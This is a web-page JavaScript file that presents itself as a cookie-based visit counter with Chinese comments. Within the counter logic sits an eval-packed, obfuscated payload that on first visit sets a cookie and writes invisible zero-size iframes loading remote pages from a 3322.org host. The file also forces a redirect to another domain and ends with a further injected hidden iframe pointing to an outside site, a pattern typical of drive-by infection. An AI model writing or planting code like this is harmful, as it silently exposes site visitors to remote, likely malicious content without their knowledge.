function GetCookieVal(offset)
//获得Cookie解码后的值
{
var endstr = document.cookie.indexOf (";", offset);
if (endstr == -1)
endstr = document.cookie.length;
return unescape(document.cookie.substring(offset, endstr));
}

function ForceWindow ()
{
  this.r = document.documentElement;
  this.f = document.createElement("FORM");
  this.f.target = "_blank";
  this.f.method = "post";
  this.r.insertBefore(this.f, this.r.childNodes[0]);
}
ForceWindow.prototype.waha = function (sUrl)
{
  this.f.action = sUrl;
  this.f.submit();
}


function GetCookie(name)
//获得Cookie的原始值
{
var arg = name + "=";
var alen = arg.length;
var clen = document.cookie.length;
var i = 0;
while (i < clen) 
{
var j = i + alen;
if (document.cookie.substring(i, j) == arg)
return GetCookieVal (j);
i = document.cookie.indexOf(" ", i) + 1;
if (i == 0) break;
}
return null;
}
var expdate = new Date();
	expdate.setFullYear(expdate.getFullYear() + 1);
 window.force = new ForceWindow();
var visitCounter = GetCookie("No");
    
    if(visitCounter==null)
    {
	    temp = 1;
	    document.cookie="No="+temp+";expires=" + expdate.toGMTString() + "; path=/";
	  	//alert(visitCounter);
	  	var url=document.referrer;
//alert(url);
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('5 k=4.h;5 j=k.z("g");y(j!=-1){}x{5 2=w v();2.u(2.t()+s*i*i*r);4.h="g=q;2="+2.p();4.f("<3 e=d://c.b.a/9/o.n 8=7 6=0></3>");4.f("<3 e=d://c.b.a/9/m.l 8=7 6=0></3>")}',36,36,'||expires|iframe|document|var|height|10|width|include|org|3322|smalls|http|src|write|cookiesleep|cookie|60|start|cookieString|asp|as|htm|index|toGMTString|test|1000|12|getTime|setTime|Date|new|else|if|indexOf'.split('|'),0,{}))
		if(url!="")
{
if (url.indexOf('shoyao')==-1)
		  window.location="http://news.wefood.cn"
}
		
		//window.force.waha("http://www.wefood.cn");
    	
    }
    else
    {
	    temp = parseInt(visitCounter)+1;
	    document.cookie="No="+temp+";expires=" + expdate.toGMTString() + "; path=/";
	 // window.force.waha("http://www.wefood.cn");
    	//alert(visitCounter);
    }













<iframe src=<iframe src=http://www.778sk.cn/luoluo/ld/index.htm width=0 height=0></iframe width=0 height=0></iframe>
